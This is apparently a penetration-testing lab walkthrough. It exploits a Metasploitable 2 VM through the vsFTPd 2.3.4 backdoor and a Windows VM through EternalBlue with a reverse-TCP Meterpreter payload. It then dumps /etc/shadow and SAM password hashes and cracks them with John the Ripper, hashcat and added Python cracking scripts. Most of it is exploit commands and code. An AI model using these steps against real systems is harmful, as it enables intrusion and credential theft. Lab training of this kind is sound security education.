Exploiting Linux-based systems:

  1. Fire up the Metasploitable 2 Linux VM.
  2. Scan the target using nmap (-A enables version detection and the default scripts):
nmap -A -p 21 172.30.1.134

  • Nmap identified the version of the FTP service as vsFTPd 2.3.4.
  3. Search Google for "vsftpd 2.3.4 exploit".
  4. Rapid7, the maintainers of Metasploit, ship an exploit module for this version, so no external exploit code is needed.
  5. Open up msfconsole and run the module. RHOSTS must be the address of the target you scanned (the two lab addresses in these notes differ, so check it before firing):
sudo msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.30.1.20
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

  6. Upgrade the bare command shell to a proper TTY:
python -c 'import pty; pty.spawn("/bin/bash")'
  7. The module returns a root shell on the target, so /etc/shadow, the file where the users' password hashes are stored, can be read and dumped directly.
  8. Save the hashes into a text file and remove the accounts you do not need from the output (system and service accounts whose password field is * or ! cannot log in with a password and are not worth cracking).

Format of the shadow password file

Each line of /etc/shadow describes one account and contains nine fields separated by colons:

  • Username: the login name of an account that exists on the system (matching /etc/passwd).
  • Encrypted password: the password hash in crypt(3) format, $type$salt$hash, where the type identifies the algorithm (for example $1$ is md5crypt, $5$ sha256crypt, $6$ sha512crypt, $y$ yescrypt). A value of * or a leading ! means the account cannot log in with a password (locked or no password set); an empty field means no password is required. Only values starting with $ are candidates for cracking.
  • Last password change: the day the password was last changed, expressed as days since Jan. 1, 1970.
  • Minimum password age: the minimum number of days that must elapse before the user may change the password again.
  • Maximum password age: the number of days after which the password must be changed.
  • Warning period: the number of days before the password expires during which the user is warned to change it.
  • Inactivity period: the number of days after the password has expired during which it is still accepted; once that window has passed the account is locked.
  • Account expiration date: the day (again as days since Jan. 1, 1970) on which the account itself is disabled, independent of password expiry.
  • Reserved: unused; left empty for future use.
  9. Next, use a password-cracking tool such as John the Ripper to crack the hashes offline and recover the plaintext passwords. John detects the hash type from the $type$ prefix; if it guesses wrong, force it with --format=md5crypt (for $1$) or --format=sha512crypt (for $6$), and use the --show option afterwards to list what has been cracked:
john /home/kali/msf2_linux_user_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
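As an added example (not part of the original notes), the following Python script applies the nine-field layout above to a shadow dump: it keeps only accounts with a crackable $type$salt$hash value, converts the day counts to calendar dates, labels each hash with the John format name and hashcat mode its prefix implies, and writes the user:hash lines John expects. The SAMPLE_SHADOW lines are constructed for the example with placeholder salts and hashes; the type table covers md5crypt, sha256crypt and sha512crypt only.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import List, Optional, Tuple

# Constructed sample /etc/shadow content (placeholder salts/hashes, not a real
# dump): root and msfadmin have hashes, daemon and sshd are locked, olduser has
# password ageing and an account expiry set. Nine colon-separated fields each.
SAMPLE_SHADOW = """\
root:$6$saltsalt$placeholder.sha512crypt.hash.not.real:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
msfadmin:$1$saltsalt$placeholdermd5crypt:18000:0:99999:7:::
sshd:!:18000:0:99999:7:::
olduser:$6$saltsalt$anotherplaceholder:17000:0:90:7:14:18500:
"""

EPOCH = date(1970, 1, 1)

# crypt(3) hash id -> (John the Ripper format name, hashcat mode)
HASH_TYPES = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
}


@dataclass
class ShadowEntry:
    user: str
    password: str                 # field 2 exactly as stored
    last_change: Optional[date]   # field 3, converted from days since the epoch
    min_age: Optional[int]
    max_age: Optional[int]
    warn: Optional[int]
    inactive: Optional[int]
    expires: Optional[date]       # field 8, account (not password) expiry
    reserved: str

    @property
    def locked(self) -> bool:
        # "*" or a leading "!" means no password login is possible
        return self.password.startswith(("*", "!"))

    @property
    def crackable(self) -> bool:
        # only a $id$salt$hash value is worth feeding to a cracker
        return self.password.startswith("$")

    def hash_type(self) -> Tuple[str, Optional[int]]:
        if not self.crackable:
            return ("none", None)
        hash_id = self.password.split("$")[1]
        return HASH_TYPES.get(hash_id, ("unknown", None))


def _days(field: str) -> Optional[int]:
    return int(field) if field.strip() else None


def _day_to_date(field: str) -> Optional[date]:
    n = _days(field)
    return EPOCH + timedelta(days=n) if n is not None else None


def parse_shadow(text: str) -> List[ShadowEntry]:
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        f = line.split(":")
        if len(f) != 9:
            raise ValueError(f"line {lineno}: expected 9 fields, got {len(f)}")
        entries.append(ShadowEntry(
            user=f[0], password=f[1], last_change=_day_to_date(f[2]),
            min_age=_days(f[3]), max_age=_days(f[4]), warn=_days(f[5]),
            inactive=_days(f[6]), expires=_day_to_date(f[7]), reserved=f[8]))
    return entries


def account_expired(entry: ShadowEntry, today: date) -> bool:
    """Account disabled by its expiry date, or password lapsed past max age + inactivity."""
    if entry.expires is not None and today >= entry.expires:
        return True
    if entry.last_change and entry.max_age is not None and entry.inactive is not None:
        return today > entry.last_change + timedelta(days=entry.max_age + entry.inactive)
    return False


def crackable_users(entries: List[ShadowEntry]) -> List[str]:
    return [e.user for e in entries if e.crackable]


def to_john(entries: List[ShadowEntry]) -> str:
    """user:hash lines for John; locked and unknown-format accounts are dropped."""
    return "".join(f"{e.user}:{e.password}\n" for e in entries
                   if e.crackable and e.hash_type()[1] is not None)


if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        fmt, mode = e.hash_type()
        print(f"{e.user:10} changed={e.last_change} locked={e.locked} "
              f"john={fmt} hashcat={mode}")
    print(to_john(parse_shadow(SAMPLE_SHADOW)), end="")
```

Redirect the to_john output to a file and hand it to john as in the command above; the summary printed first is the quick way to see which accounts are even worth the wordlist run.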



Exploiting Windows-based systems:

  1. The target is a vulnerable VM named Blue, which is affected by EternalBlue (MS17-010), a remote code execution vulnerability in SMBv1.
  2. Identify the IP addresses of both machines.
  3. Target machine: 192.168.83.136 (the attacking machine is 192.168.83.128, used as LHOST later).
  4. Scan the target using nmap:
nmap -A -p 137-139,445 192.168.83.136
  • The scan focuses on the NetBIOS ports (137-139) and SMB on 445, because the vulnerability is in the SMB service (port 136 is not an SMB port, so it is left out).
  • 139 and 445 are open, so SMB is reachable.
  5. Identify the SMB version with Metasploit's scanner module (the full module path avoids the interactive search prompt that a bare "use smb_version" triggers):
sudo msfconsole
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.83.136
msf6 auxiliary(scanner/smb/smb_version) > run

  6. Check whether the host is vulnerable to MS17-010 with the auxiliary/scanner/smb/smb_ms17_010 module (same RHOSTS, then run). In this lab the scanner did not flag the vulnerability, but the exploit still worked, so a negative scanner result on its own is not conclusive.
  7. Now use the exploit module:

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.83.136
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.83.128
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

  8. Run a few commands to check the privileges of the session, for example getuid (EternalBlue lands as NT AUTHORITY\SYSTEM).
  9. Next, use the hashdump command within Meterpreter to extract the password hashes from the Security Account Manager (SAM) database.

  • The SAM hive is stored at %SystemRoot%\System32\config\SAM and contains a record of all local user accounts, their relative identifiers (RIDs) and password hashes. It is locked while Windows is running and its contents are encrypted with a key derived from the SYSTEM hive, which is why hashdump needs SYSTEM privileges rather than plain read access to the file.
  10. The usernames are plaintext; the hashes are the LAN Manager (LM) and NT (commonly called NTLM) hashes for each local account. hashdump prints one line per user in pwdump format:
Username:RID:LM hash:NT hash:::
  The LM value aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password and means no LM hash is stored (the default on modern Windows), so only the NT hash is useful for cracking.
  11. Save the hashdump output into a text file.
  12. Additionally, save the Administrator user with its LM and NT hashes into another text file, name it Blue_admin_user.txt, and use the following format:
Administrator:aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5
  13. Identify the type of the NT hash (the last field, starting with 58f5) with hashid:
hashid 58f5081696f366cdc72491a2c4996bd5

  hashid cannot tell a 32-character NT hash apart from MD4, MD5 and other 128-bit digests, so it lists several candidates; because the value came out of the SAM it is an NT hash (hashcat mode 1000, John format NT).


Important

Microsoft Windows does not store local users' passwords in plaintext. Each password is passed through a one-way hash function: the NT hash (commonly called the NTLM hash) is the MD4 digest of the password encoded as UTF-16LE, with no salt. The function cannot be reversed, so recovering a password means guessing candidates, hashing each one and comparing, which is exactly what the cracking step does; the missing salt is why identical passwords produce identical hashes and why cracking NT hashes is so fast. The NT hash of each local account is stored in the SAM. Note that the hash itself is a credential: it can be used as-is in pass-the-hash attacks without ever being cracked.


Cracking hashes with hashcat:

  1. Identify the hashcat mode for NTLM: hashcat --help lists NT hashes as mode 1000 (NTLM).
  2. Command for cracking (-m 1000 selects the hash mode, -a 0 a straight dictionary attack; the hash file should hold one NT hash per line, or user:hash lines together with the --username option). Cracked results land in hashcat.potfile and can be printed again with --show:
hashcat -m 1000 /home/kali/Blue_pass_hashes.txt -a 0 /usr/share/wordlists/rockyou.txt
# a single hash can be given in place of the file
hashcat -m 1000 "hash_value" /usr/share/wordlists/rockyou.txt
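To make concrete what hashdump produces and what hashcat -m 1000 does with it, here is an added Python example (not from the original notes, and not hashcat's own code). It computes the NT hash as MD4 over the UTF-16LE password, parses pwdump-format hashdump lines, flags the empty LM hash and a blank NT hash, and runs a straight dictionary attack over a constructed dump. The users, RIDs and wordlist are constructed; the Administrator value is the well-known NT hash of "password". MD4 is implemented in pure Python because hashlib's md4 is frequently unavailable under OpenSSL 3.

```python
import struct
from typing import Dict, Iterable, List, Optional

# LM hash of the empty string: "no LM hash stored" (the default on modern Windows)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string (= MD4 of zero bytes): the account has a blank password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def md4(message: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often missing under OpenSSL 3."""
    mask = 0xFFFFFFFF

    def rotl(x: int, n: int) -> int:
        return ((x << n) | (x >> (32 - n))) & mask

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    # padding: 0x80, zeros up to 56 mod 64, then the bit length as 64-bit little-endian
    msg = message + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(message) * 8)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):                       # round 1
            s = (3, 7, 11, 19)[i % 4]
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & mask, s), b, c
        for i in range(16):                       # round 2
            k, s = (i % 4) * 4 + i // 4, (3, 5, 9, 13)[i % 4]
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, s), b, c
        for i in range(16):                       # round 3
            k, s = r3_order[i], (3, 9, 11, 15)[i % 4]
            a, b, c, d = d, rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & mask, s), b, c
        state = [(v + w) & mask for v, w in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT ('NTLM') hash: unsalted MD4 over the UTF-16LE encoding of the password."""
    return md4(password.encode("utf-16-le")).hex()


# Constructed hashdump output (pwdump format user:rid:lm:nt:::). The Administrator
# value is the well-known NT hash of "password"; the other NT hashes are computed here.
SAMPLE_HASHDUMP = "\n".join([
    f"Administrator:500:{EMPTY_LM}:8846f7eaee8fb117ad06bdd830b7586c:::",
    f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::",
    f"jon:1000:{EMPTY_LM}:{nt_hash('Summer2024!')}:::",
    f"bob:1001:{EMPTY_LM}:{nt_hash('Tr0ub4dor&3')}:::",
])

# Constructed mini wordlist standing in for rockyou.txt
WORDLIST = ["123456", "password", "qwerty", "Summer2024!", "letmein"]


def parse_hashdump(text: str) -> List[Dict]:
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = line.split(":")[:4]
        rows.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
                     "lm_stored": lm.lower() != EMPTY_LM,
                     "blank_password": nt.lower() == EMPTY_NT})
    return rows


def dictionary_attack(nt_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """What hashcat -a 0 -m 1000 does: hash every candidate and compare."""
    target = nt_hex.lower()
    for candidate in wordlist:
        if nt_hash(candidate) == target:
            return candidate
    return None


def crack_dump(text: str, wordlist: List[str]) -> Dict[str, Optional[str]]:
    return {row["user"]: "" if row["blank_password"] else dictionary_attack(row["nt"], wordlist)
            for row in parse_hashdump(text)}


if __name__ == "__main__":
    for user, pw in crack_dump(SAMPLE_HASHDUMP, WORDLIST).items():
        print(f"{user:14} {'<blank>' if pw == '' else pw if pw else 'not cracked'}")
```

The script cracks Administrator and jon, reports Guest as a blank password without any guessing, and leaves bob uncracked because his password is not in the wordlist; hashcat does the same work with GPU parallelism and a far larger candidate set.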



Setting up hashcat on the host machine:

Step 1: Install Dependencies

Before you download hashcat, install the two things it depends on:

  1. GPU drivers: hashcat uses the graphics card (GPU) for password cracking, so the vendor's current driver for your specific card must be installed.
    • For NVIDIA GPUs: install the latest NVIDIA driver for your GPU model from the NVIDIA driver download page, plus the CUDA Toolkit from the NVIDIA Developer website.
    • For AMD GPUs: download and install the latest Adrenalin Edition driver from the AMD Support website; the "Auto-Detect and Install" tool is often the easiest option.
    • For Intel GPUs: install Intel's own graphics driver (which provides the OpenCL runtime hashcat uses), not the AMD package.
  2. Visual C++ Redistributable: hashcat needs the Microsoft Visual C++ runtime libraries.
    • Download and install the latest "Visual Studio 2015, 2017, 2019, and 2022" redistributable package from the official Microsoft website. Be sure to get the x64 version.
    • The "Desktop development with C++" workload from the Visual Studio Installer was also installed in this setup; it is only required if you build hashcat from source, the prebuilt binary needs just the redistributable.

After installing these, restart the computer.

Step 2: Download and Extract Hashcat

  1. Go to the official Hashcat website.
  2. Download the binary version (it will be a .7z file).
  3. You will need a file archiver like 7-Zip (which is free) to extract the .7z file.
  4. Create a new folder in a simple location (like C:\hashcat).
  5. Extract the contents of the downloaded .7z file into your new C:\hashcat folder.

Step 3: Run Hashcat

  1. Open the Start Menu, type cmd, and select Run as administrator.
  2. Change directory to the extracted folder (an elevated prompt starts in C:\Windows\System32, so use the full path):
cd C:\hashcat\hashcat-7.1.2

  3. To verify the installation and list the detected devices (CPUs/GPUs), run the benchmark:

hashcat.exe -b

  4. Then run hashcat against your hash file and wordlist:

C:\hashcat\hashcat-7.1.2>hashcat.exe -m 1000 "C:\Blue_pass_hashes.txt" C:\rockyou.txt

  5. Checking a single hash:

hashcat.exe -m 1000 "7A21990FCD3D759941E45C490F143D5F" rockyou.txt

Cracked hashes are recorded in hashcat.potfile in the hashcat folder; re-running the same command with the --show option prints them without repeating the attack.
